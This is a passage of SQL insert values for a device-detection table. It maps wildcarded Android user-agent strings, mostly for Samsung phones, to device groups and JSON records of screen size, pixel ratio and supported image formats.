Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SL555) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":768,\"pixelRatio\":1.25,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-A300FU) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-A300Y) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-A310F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-A310M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-A320F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-A320FL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-A320Y) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-A500F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-A500FU) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-A500G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-A500H) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-A500K) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-A500L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-A500M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-A500S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-A500W) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-A500Y) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-A510F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-A510M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-A510Y) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-A520F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-A7000) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-A700F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-A700FD) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-A700H) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-A700K) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-A700S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-A710F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-A710M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-A710Y) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-A720F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-A8000) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-A800F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-A800I) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-A9000) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-A9100) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-A910F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-C5000) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_c','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-C5010) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_c','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-C5018) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_c','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-C7000) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_c','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-C7010) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_c','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-C7018) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_c','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-C9000) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_c','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-C9008) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_c','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-C900F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_c','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-G1600) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-G389F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-G532F) AppleWebKit/* (KHTML, like Gecko) Chrome','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-G532F) AppleWebKit/* (KHTML, like Gecko) Chrome (lite) Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-G532F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-G532F) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-G532G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-G532G) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-G532M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-G532MT) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-G550FY) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-G550T) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-G550T1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-G550T2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-G5510) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-G5520) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-G5528) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-G5700) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-G570F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-G570F/DS) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-G570M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-G570Y) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-G600F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-G600FY) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-G600S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-G6100) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-G610F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-G610F/DS) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-G610M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-G610Y) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-G800F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-G800H) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-G800M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-G870W) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SM-G900F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile 